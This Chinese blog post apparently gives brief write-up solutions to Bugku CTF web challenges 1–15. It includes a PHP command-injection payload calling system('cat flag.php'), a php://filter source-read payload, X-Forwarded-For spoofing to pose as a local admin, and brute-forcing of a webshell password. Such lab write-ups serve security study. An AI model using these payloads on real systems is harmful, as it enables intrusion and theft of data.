Bugku_web1-15

0x01 web1

payload:F12

0x02 web2

payload:F12->Elements->右键修改为maxlength="2"

0x03 web3

payload:http://114.67.246.176:12552/?what=flag

0x04 web4

payload:以post方式传参

0x05 web5

payload:?num=1a

0x06 web6

站长工具中Unicode转ASCII
f

0x01 web7

抓包,重复发送,有一个就是flag

0x01 web8

payload:"".system('cat flag.php')

0x01 web9

$GLOBALS的作用是:引用全局作用域中可用的全部变量,变量的名字就是数组的键。
var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

payload:?args=GLOBALS

0x0A web10

抓包看响应头

0x0B web11

扫描得shell.php,爆破密码为hack

0x0C web12

源代码中有base64,解密得密码,用户名为admin,发送请求时加上X-Forwarded-For:127.0.0.1【本地管理员】

0x0D web13

查看源代码发现js代码,改eval为alert,执行后复制弹出的代码,观察可得复制if中的值到框中即可拿flag

0x0Eweb14

payload:file=php://filter/read=convert.base64-encode/resource=index.phpbase64解码即可

0x0F web15

5位数爆破,12468

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值